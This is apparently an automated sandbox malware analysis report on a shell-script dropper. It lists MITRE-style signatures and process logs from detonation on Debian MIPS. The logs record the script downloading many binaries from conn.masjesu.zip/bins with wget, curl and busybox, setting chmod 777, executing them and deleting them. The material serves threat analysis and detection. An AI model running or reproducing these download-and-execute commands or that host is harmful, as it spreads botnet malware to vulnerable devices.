Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-dm5thatdmc
Target f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
SHA256 f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2

Threat Level: Shows suspicious behavior

The file f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 03:08

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 03:08

Reported

2024-10-18 03:11

Platform

debian9-mipsbe-20240729-en

Max time kernel

138s

Max time network

136s

Command Line

[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL N/A
N/A /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK N/A
N/A /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB N/A
N/A /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I N/A
N/A /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O N/A
N/A /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ N/A
N/A /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S N/A
N/A /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv N/A
N/A /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp N/A
N/A /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 N/A
N/A /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 N/A
N/A /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw N/A
N/A /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn N/A
N/A /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A N/A
N/A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL N/A
N/A /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK N/A
N/A /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB N/A
N/A /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I N/A
N/A /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O N/A
N/A /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ N/A
N/A /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S N/A
N/A /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A N/A
N/A /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv N/A
N/A /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp N/A
N/A /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 N/A
N/A /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 N/A
N/A /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw N/A
N/A /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /usr/bin/curl N/A
File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /usr/bin/curl N/A
File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /usr/bin/curl N/A
File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /usr/bin/curl N/A
File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /usr/bin/curl N/A
File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /usr/bin/curl N/A
File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /usr/bin/curl N/A
File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /usr/bin/curl N/A
File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /usr/bin/curl N/A
File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /usr/bin/curl N/A
File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /usr/bin/curl N/A
File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /usr/bin/curl N/A
File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /usr/bin/curl N/A
File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /usr/bin/curl N/A
File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /usr/bin/curl N/A
File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /usr/bin/curl N/A
File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /usr/bin/curl N/A
File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /usr/bin/curl N/A
File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /usr/bin/curl N/A
File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /usr/bin/curl N/A
File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /usr/bin/curl N/A
File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /usr/bin/curl N/A
File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /usr/bin/curl N/A
File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /usr/bin/curl N/A
File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /usr/bin/curl N/A
File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /usr/bin/curl N/A
File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /usr/bin/curl N/A
File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /usr/bin/curl N/A

Processes

/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh

[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/chmod

[chmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL

[./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/rm

[rm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/chmod

[chmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK

[./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/rm

[rm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/chmod

[chmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB

[./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/rm

[rm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/chmod

[chmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I

[./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/rm

[rm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/chmod

[chmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O

[./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/rm

[rm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/chmod

[chmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ

[./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/rm

[rm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/chmod

[chmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S

[./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/bin/rm

[rm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/chmod

[chmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv

[./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/bin/rm

[rm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/chmod

[chmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp

[./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/bin/rm

[rm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/chmod

[chmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4

[./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/bin/rm

[rm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/chmod

[chmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7

[./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/bin/rm

[rm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/chmod

[chmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw

[./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/bin/rm

[rm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/chmod

[chmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn

[./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/bin/rm

[rm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/chmod

[chmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A

[./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/bin/rm

[rm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/chmod

[chmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL

[./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/bin/rm

[rm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/chmod

[chmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK

[./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/bin/rm

[rm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/chmod

[chmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB

[./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/bin/rm

[rm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/chmod

[chmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I

[./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/bin/rm

[rm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/chmod

[chmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O

[./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/bin/rm

[rm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/chmod

[chmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ

[./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]

/bin/rm

